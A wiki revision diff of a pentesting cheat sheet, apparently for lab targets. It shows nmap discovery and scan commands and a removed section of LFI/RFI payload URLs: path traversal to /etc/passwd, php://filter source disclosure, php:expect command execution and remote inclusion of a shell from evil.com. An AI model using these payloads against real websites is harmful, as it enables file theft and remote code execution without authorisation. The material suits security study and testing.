Difference between revisions of "Cheat Sheet"

(LFI / RFI)
(Tag: Replaced)
Line 3: Line 3:
 
nmap -sP 192.168.56.0/24
 
nmap -sP 192.168.56.0/24
 
nmap -O -sT -sV -p- -T5 192.168.56.101
 
nmap -O -sT -sV -p- -T5 192.168.56.101
</syntaxhighlight>
 
 
===== LFI / RFI =====
 
<syntaxhighlight>
 
http://example.com/index.php?page=../../../etc/passwd
 
http://example.com/index.php?page=../../../etc/passwd%00
 
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
 
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
 
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
 
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
 
http://example.com/index.php?page=....//....//etc/passwd
 
http://example.com/index.php?page=..///////..////..//////etc/passwd
 
http://example.com/index.php?page=http://evil.com/shell.txt
 
http://example.com/index.php?page=http://evil.com/shell.txt%00
 
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
 
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
 
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
 
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
 
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
 
http://example.com/index.php?page=php:expect://id
 
http://example.com/index.php?page=php:expect://ls
 
http://example.com/index.php?page=path/to/uploaded/file.png
 
 
</syntaxhighlight>
 
</syntaxhighlight>

Revision as of 13:23, 26 April 2018

nmap
# Host discovery only: -sP is a ping sweep with no port scan (newer nmap
# releases spell the same option -sn). 192.168.56.0/24 is private (RFC 1918)
# address space and contains the single target scanned below.
nmap -sP 192.168.56.0/24
# Full TCP scan of one host:
#   -O   OS fingerprinting (needs raw-socket privileges, i.e. root)
#   -sT  TCP connect scan; completes the handshake, so every probe can
#        appear in the target's connection logs
#   -sV  service/version detection on the open ports
#   -p-  all ports, 1-65535
#   -T5  "insane" timing template: fastest, but nmap's documentation notes
#        it can trade accuracy for speed (missed ports on slow or lossy links)
nmap -O -sT -sV -p- -T5 192.168.56.101